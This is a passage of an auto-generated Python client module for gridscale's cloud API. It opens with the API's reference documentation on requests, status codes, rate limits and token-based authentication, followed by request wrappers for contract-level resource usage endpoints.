| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d2ced5e97cc035d17294a83dd2a2034a7d4d031
| 121,784
|
py
|
Python
|
gs_api_client/swagger/api/usage_api.py
|
gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | 7
|
2019-07-12T13:59:45.000Z
|
2021-03-16T08:46:20.000Z
|
gs_api_client/swagger/api/usage_api.py
|
gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | 13
|
2020-01-23T07:50:29.000Z
|
2022-03-21T14:32:40.000Z
|
gs_api_client/swagger/api/usage_api.py
|
gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
API Specification
# Introduction Welcome to gridscales API documentation. A REST API is a programming interface that allows you to access and send data directly to our systems using HTTPS requests, without the need to use a web GUI. All the functionality you are already familiar with in your control panel is accessible through the API, including expert methods that are only available through the API. Allowing you to script any actions you require, regardless of their complexity. First we will start with a general overview about how the API works, followed by an extensive list of each endpoint, describing them in great detail. ## Requests For security, gridscale requires all API requests are made through the HTTPS protocol so that traffic is encrypted. The following table displays the different type of requests that the interface responds to, depending on the action you require. | Method | Description | | --- | --- | | GET | A simple search of information. The response is a JSON object. Requests using GET are always read-only. | | POST | Adds new objects and object relations. The POST request must contain all the required parameters in the form of a JSON object. | | PATCH | Changes an object or an object relation. The parameters in PATCH requests are usually optional, so only the changed parameters must be specified in a JSON object. | | DELETE | Deletes an object or object relation. The object is deleted if it exists. | | OPTIONS | Get an extensive list of the servers support methods and characteristics. We will not give example OPTION requests on each endpoint, as they are extensive and self-descriptive. | <aside class=\"notice\"> The methods PATCH and DELETE are idempotent - that is, a request with identical parameters can be sent several times, and it doesn't change the result. 
</aside> ## Status Codes | HTTP Status | `Message` | Description | | --- | --- | --- | | 200 | `OK` | The request has been successfully processed and the result of the request is transmitted in the response. | | 202 | `Accepted` | The request has been accepted, but will run at a later date. Meaning we can not guarantee the success of the request. You should poll the request to be notified once the resource has been provisioned - see the requests endpoint on how to poll. | | 204 | `No Content` | The request was successful, but the answer deliberately contains no data. | | 400 | `Bad Request` | The request message was built incorrectly. | | 401 | `Unauthorised` | The request can not be performed without a valid authentication. X-Auth UserId or X-Auth token HTTP header is not set or the userID / token is invalid. | | 402 | `Payment Required` | Action can not be executed - not provided any or invalid payment methods. | | 403 | `Forbidden` | The request was not carried out due to lack of authorization of the user or because an impossible action was requested. | | 404 | `Not Found` | The requested resource was not found. Will also be used if you do a resource exists, but the user does not have permission for it. | | 405 | `Method Not Allowed` | The request may be made only with other HTTP methods (eg GET rather than POST). | | 409 | `Conflict` | The request was made under false assumptions. For example, a user can not be created twice with the same email. | | 415 | `Unsupported Media Type` | The contents of the request have been submitted with an invalid media type. All POST or PATCH requests must have \"Content-Type : application / json\" as a header, and send a JSON object as a payload. | | 416 | `Requested Range Not Satisfiable` | The request could not be fulfilled. It is possible that a resource limit was reached or an IPv4 address pool is exhausted. | | 424 | `Failed Dependency` | The request could not be performed because the object is in the wrong status. 
| | 429 | `Too Many Requests` | The request has been rejected because rate limits have been exceeded. | <aside class=\"success\"> Status 200-204 indicates that the request has been accepted and is processed. </aside> <aside class=\"notice\"> Status 400-429 indicates that there was a problem with the request that originated on the client. You will find more information about the problem in the body of 4xx response. </aside> <aside class=\"warning\"> A status 500 means that there was a server-side problem and your request can not be processed now. </aside> ## Request Headers | Header | Description | | --- | --- | | Content-Type | Always \"application/json\". | | X-Auth-userId | The user UUID. This can be found in the panel under \"API\" and will never change ( even after the change of user e-mail). | | X-Auth-Token | Is generated from the API hash and must be sent with all API requests. Both the token and its permissions can be configured in the panel.| ## Response Headers | Header | Description | | --- | --- | | Content-Type | Always \"application/json\". | | X-Time-Provisioning | The time taken to process the request (in ms). | | X-Api-Identity | The currently active Provisioning API version. Useful when reporting bugs to us. | | X-Request-Id | The unique identifier of the request, be sure to include it when referring to a request. | | RateLimit-Limit | The number of requests that can be made per minute. | | RateLimit-Remaining | The number of requests that still remain before you hit your request limit. | | RateLimit-Reset | A [Unix timestamp](https://en.wikipedia.org/wiki/Unix_time) in milliseconds of when the rate limit will reset, or the time at which a request no longer will return 429 - Too Many Requests. 
| ## Timestamp Format All timestamps follow <a href=\"https://de.wikipedia.org/wiki/ISO_8601\" target=\"_blank_\">ISO 8601</a> and issued in <a href=\"https://www.timeanddate.de/zeitzonen/utc-gmt\" target=\"_blank_\">UTC</a> ## CORS ### Cross Origin Resource Sharing To allow API access from other domains that supports the API CORS (Cross Origin Resource Sharing). See: enable-cors.org/ . This allows direct use the API in the browser running a JavaScript web control panel. All this is done in the background by the browser. The following HTTP headers are set by the API: Header | Parameter | Description --- | --- | --- Access-Control-Allow-Methods | GET, POST, PUT, PATCH, DELETE, OPTIONS | Contains all available methods that may be used for queries. Access-Control-Allow-Credentials | true | Is set to \"true\". Allows the browser to send the authentication data via X-Auth HTTP header. Access-Control-Allow-Headers | Origin, X-Requested-With, Content-Type, Accept, X-Auth-UserId, X-Auth-Token, X-Exec-Time, X-API-Version, X-Api-Client | The HTTP headers available for requests. Access-Control-Allow-Origin | * | The domain sent by the browser as a source of demand. Access-Control-Expose-Headers | X-Exec-Time, X-Api-Version | The HTTP headers that can be used by a browser application. ## Rate Limits The number of requests that can be made through our API is currently limited to 210 requests per 60 seconds. The current state of rate limiting is returned within the response headers of each request. The relevant response headers are - RateLimit-Limit - RateLimit-Remaining - RateLimit-Reset See the Response Headers section for details. As long as the `RateLimit-Remaining` count is above zero, you will be able to make further requests. As soon as the `RateLimit-Remaining` header value is zero, subsequent requests will return the 429 status code. This will stay until the timestamp given in `RateLimit-Reset` has been reached. 
### Example rate limiting response ```shell HTTP/1.0 429 TOO MANY REQUESTS Content-Length: 66 Content-Type: application/json; charset=utf-8 Date: Mon, 11 Nov 2019 11:11:33 GMT RateLimit-Limit: 210 RateLimit-Remaining: 0 RateLimit-Reset: 1573468299256 { \"id\": \"too_many_requests\", \"message\": \"API Rate limit exceeded.\" } ``` It is important to understand how rate limits are reset in order to use the API efficiently. Rate limits are reset for all counted requests at once. This means that that once the timestamp `RateLimit-Remaining` has arrived all counted request are reset and you can again start sending requests to the API. This allows for short burst of traffic. The downside is once you have hit the request limit no more requests are allowed until the rate limit duration is reset. ## Object Relations Relationships describe resource objects (storages, networks, IPs, etc.) that are connected to a server. These relationships are treated like objects themselves and can have properties specific to this relation. One example would be, that the MAC address of a private network connected to a server (Server-to-Network relation) can be found as property of the relation itself - the relation is the _network interface_ in the server. Another example is storage, where the SCSI LUN is also part of the Server-to-Storage relation object. This information is especially interesting if some kind of network boot is used on the servers, where the properties of the server need to be known beforehand. ## Deleted Objects Objects that are deleted are no longer visible on their *regular* endpoints. For historical reasons these objects are still available read-only on a special endpoint named /deleted. If objects have been deleted but have not yet been billed in the current period, the yet-to-be-billed price is still shown. <!-- #strip_js --> ## Node.js / Javascript Library We have a JavaScript library for you to use our API with ease. 
<a href=\"https://badge.fury.io/js/%40gridscale%2Fgsclient-js\"><img src=\"https://badge.fury.io/js/%40gridscale%2Fgsclient-js.svg\" alt=\"npm version\" height=\"18\"></a> <aside class=\"success\"> We want to make it even easier for you to manage your Infrastructure via our API - so feel free to contact us with any ideas, or languages you would like to see included. </aside> Requests with our Node.js lib return a little differently. Everything is the same except it allows you to add URL parameters to customize your requests. To get started <a href=\"https://www.npmjs.com/package/@gridscale/gsclient-js\" target=\"_blank\">click here</a> . <!-- #strip_js_end --> <!-- #strip_go --> ## Golang Library We also have a Golang library for Gophers. Requests with our Golang lib return a little differently. Everything is the same except it allows you to add URL parameters to customize your requests. To get started <a href=\"https://github.com/gridscale/gsclient-go\" target=\"_blank\">click here</a> . <!-- #strip_go_end --> <!-- #strip_python --> ## Python Library We have a Python library, that optionally also simplifies handling of asynchronous requests by mimicking synchronous blocking behaviour. To get started <a href=\"https://pypi.org/project/gs-api-client/\" target=\"_blank\">click here</a> . <!-- #strip_python_end --> # Authentication In order to use the API, the User-UUID and an API_Token are required. Both are available via the web GUI which can be found here on <a href=\"https://my.gridscale.io/APIs/\" target=\"_blank\">Your Account</a> <aside class=\"success\"> If you are logged in, your UUID and Token will be pulled dynamically from your account, so you can copy request examples straight into your code. </aside> The User-UUID remains the same, even if the users email address is changed. The API_Token is a randomly generated hash that allows read/write access. 
## API_Token <table class=\"security-details\"><tbody><tr><th> Security scheme type: </th><td> API Key </td></tr><tr><th> header parameter name:</th><td> X-Auth-Token </td></tr></tbody></table> ## User_UUID <table class=\"security-details\"><tbody><tr><th> Security scheme type: </th><td> API Key </td></tr><tr><th> header parameter name:</th><td> X-Auth-UserId </td></tr></tbody></table> ## Examples <!-- #strip_js --> > Node.js ``` // to get started // read the docs @ https://www.npmjs.com/package/@gs_js_auth/api var gs_js_auth = require('@gs_js_auth/api').gs_js_auth; var client = new gs_js_auth.Client(\"##API_TOKEN##\",\"##USER_UUID##\"); ``` <!-- #strip_js_end --> <!-- #strip_go --> > Golang ``` // to get started // read the docs @ https://github.com/gridscale/gsclient-go config := gsclient.NewConfiguration( \"https://api.gridscale.io\", \"##USER_UUID##\", \"##API_TOKEN##\", false, //set debug mode ) client := gsclient.NewClient(config) ``` <!-- #strip_go_end --> > Shell Authentication Headers ``` -H \"X-Auth-UserId: ##USER_UUID##\" \\ -H \"X-Auth-Token: ##API_TOKEN##\" \\ ``` > Setting Authentication in your Environment variables ``` export API_TOKEN=\"##API_TOKEN##\" USER_UUID=\"##USER_UUID##\" ``` <aside class=\"notice\"> You must replace <code>USER_UUID</code> and <code>API_Token</code> with your personal UUID and API key respectively. </aside> # noqa: E501
OpenAPI spec version: 1.0.50
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from gs_api_client.swagger.api_client import ApiClient
class UsageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def contract_level_distributed_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_distributed_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_distributed_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_distributed_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_distributed_storage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_distributed_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/distributed_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DistributedStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_ip_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_ip_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_ip_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_ip_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_ip_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_ip_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/ip_addresses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IpsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_isoimage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_isoimage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_isoimage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_isoimage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_isoimage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_isoimage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/iso_images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IsoimagesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_loadbalancer_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_loadbalancer_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_loadbalancer_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_loadbalancer_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_loadbalancer_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_loadbalancer_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/load_balancers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoadbalancersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_paas_service_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_paas_service_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_paas_service_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_paas_service_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_paas_service_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_paas_service_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/paas_services', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaasServicesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_rocket_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_rocket_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_rocket_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_rocket_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_rocket_storage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_rocket_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/rocket_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RocketStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_server_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_server_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_server_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_server_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
